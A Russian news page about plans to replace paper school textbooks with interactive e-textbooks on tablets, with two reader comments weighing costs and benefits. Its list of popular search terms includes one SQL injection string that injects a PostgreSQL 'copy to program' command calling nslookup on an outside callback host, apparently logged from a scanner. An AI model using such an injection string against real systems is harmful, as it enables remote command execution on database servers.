Последние новости
Статьи /

Электронный учебник позволит сделать процесс обучения индивидуальным

Быстрое развитие средств ИКТ в ближайшем будущем позволит упростить школьникам обучение, уже совсем скоро целые стопки книг им могут заменить такие устройства как: планшеты, электронные книги и нетбуки. Их использование в образовании даст возможность перейти от классических бумажных учебников к современным интерактивным с мультимедийным контентом.
Почти все ученики пользуются такими технологиями дома, поэтому введение их в школьное образование сделает обучение гораздо интересней.
Привлекателен он и для учителей, которые смогут использовать индивидуальный подход к ученику.
Уже есть типовая модель школьного электронного учебника. Среди них 12 прототипов, которые разрабатываются по предметам: для 1-го класса — технология, для 1-го и 7-го классов — изобразительное искусство, для 3-го — математика и окружающий мир, для 5-го — русский язык, для 7-го — биология, для 8-го — технология, для 9-го — география, для 10-го —литература и геометрия, для 11-го — физика.
Но несмотря на большие преимущества в использовании новых технологий в обучении, остается много проблем связанным с их внедрением в школы, основные из них это финансирование и переучивание педагогов, ведь многие учителя старшего поколения трудно обучаются работе с планшетами и нетбуками.

У нас находят:
  • testing';copy (select '') to program 'nslookup dns.sqli.13405.1964-2010.1964.dbe5e.1.bxss.me
  • testing
  • учебник 8го класса биология Узьекистан скачать
  • скачать бесплатно учебники Узбнкистана
  • интересни узбекиски секс
2 комментария
JochanUnleash / 29 июля 2012 / 00:13
Процесс развития технологий не остановить. С одной стороны - новые разработки упрощают нашу жизнь, а с другой - оказывают негативное влияние на культурный фундамент, подрывая тем самым заложившиеся веками традиции и обычаи. rnЯ не смог не отреагировать на новость о том, что в институт образования будут внедрены так называемые электронные учебники, которые ( потенциально ) позволят школьникам упростить процесс обучения . Мое мнение по этому поводу разносторонне, и сейчас я попробую изложить его лаконично, понятно и емко.rnВо-первых, всем известны проблемы с "десятикилограммовыми" портфелями. Данная ситуация не раз обсуждалась в различных открытых форумах , и решить её не получается. Поэтому внедрение электронных учебников не только спасет ученика от колоссальной нагрузки на позвонок, но и позволит сэкономить время на подготовку к следующему учебному дню.rnВо-вторых, функциональность данных гаджетов избавит родителей от мучений с покупкой нужных учебников, за которыми подчас нужно ездить в другие регионы или заказывать по интернету. Ведь динамично развивающиеся технологии беспроводных сетей позволят ученику получать необходимый материал "прямо на месте" посредством беспроводных технологий. rnОднако наряду с позитивными аспектами есть и негативные:rn- Цена данных устройств rn- Консерватизм большинства учителей и их некомпетентность в обращении с такими устройствамиrnВывод: необходимо провести эксперимент с использованием электронных учебников. Если результаты будут положительными и средняя успеваемость учеников не упадет, то можно уже будет задуматься о внедрении такой системы на всероссийском уровне.
filant / 29 июля 2012 / 15:44
Это не очень верное утверждение, что электронный учебник позволит сделать процесс обучения индивидуальным. Не может никакой учебник, ни обычный, ни электронный индивидуализировать процесс обучения, это может сделать только человек, учитель, а вот учебник, особенно интерактивный, может помочь ему в этом.
имя


Популярые сообщения